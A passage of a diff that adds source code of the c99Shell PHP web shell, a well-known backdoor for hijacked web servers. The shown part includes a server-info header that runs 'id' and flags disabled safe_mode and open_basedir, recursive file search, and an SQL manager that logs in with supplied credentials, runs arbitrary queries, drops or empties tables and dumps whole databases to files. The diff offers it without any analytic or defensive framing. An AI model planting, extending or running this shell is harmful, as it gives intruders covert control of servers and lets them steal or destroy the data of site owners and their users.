+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c999fsearch"))
+{
+function c999fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c999fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c999shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>c99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+}
+echo "<br>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
